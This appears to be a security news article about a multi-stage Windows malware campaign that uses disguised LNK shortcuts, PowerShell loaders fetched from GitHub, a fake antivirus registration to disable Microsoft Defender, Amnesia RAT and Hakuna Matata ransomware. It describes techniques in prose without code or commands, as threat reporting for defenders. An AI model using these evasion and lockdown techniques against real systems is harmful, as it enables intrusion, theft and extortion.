Malware experts have identified a sophisticated multi stage malware attack on Windows operating systems through social engineering and cloud based attacks.
The attack uses business document themes to lure victims into opening compressed files containing malicious shortcuts that execute PowerShell scripts in the background.
The attack process is designed to evade Microsoft Defender before delivering destructive payloads such as ransomware, surveillance malware, and banking Trojans.
The attack is a worrying trend in malware sophistication as attackers have opted to bypass exploit code to conduct attacks.
Instead, attackers have opted to use normal OS functionality, built in admin tools, and cloud services such as GitHub and Dropbox to go undetected within normal enterprise traffic.
The attack significantly reduces the chances of signature based detection while maximizing impact through continuous multi level compromise.
The attack chain begins with a deceptive LNK shortcut file pretending to be a normal accounting document. When executed, it runs PowerShell with an execution policy bypass to download an obfuscated first stage loader script from GitHub.
Infection Vector
Threat actors have used this tool for the systematic disablement of Microsoft Defender Antivirus, which registers a fake antivirus product and utilizes trust assumptions of the Windows operating system for the automatic shutdown of Defender Antivirus.
The malware campaign has four distinct operational phases. After the neutralization of the defender, the malware campaign engages in reconnaissance and surveillance of the compromised environment, utilizing screenshot capture modules for the exfiltration of visual evidence of user activities.
The threat actors then deploy a comprehensive lockdown of the compromised system, including the disabling of administrative tools, destruction of recovery options, and hijacking of file associations, making it impossible for the compromised user to execute legitimate applications or access their own files.
Finally, the malware campaign utilizes Amnesia RAT for the establishment of persistent remote access and data theft, including browser credentials, cryptocurrency wallets, and other sensitive financial information.
Concurrently, the Hakuna Matata ransomware is deployed for the encryption of compromised user files, including the file extension NeverMind12F. WinLocker components are used for the implementation of a comprehensive lockdown of the compromised systems, including countdown timers for pressuring the compromised user into initiating contact with the attacker for ransom negotiation.
👉🏻 Found this article interesting? Follow us on Facebook, Twitter and whatsapp to read more exclusive content we post.
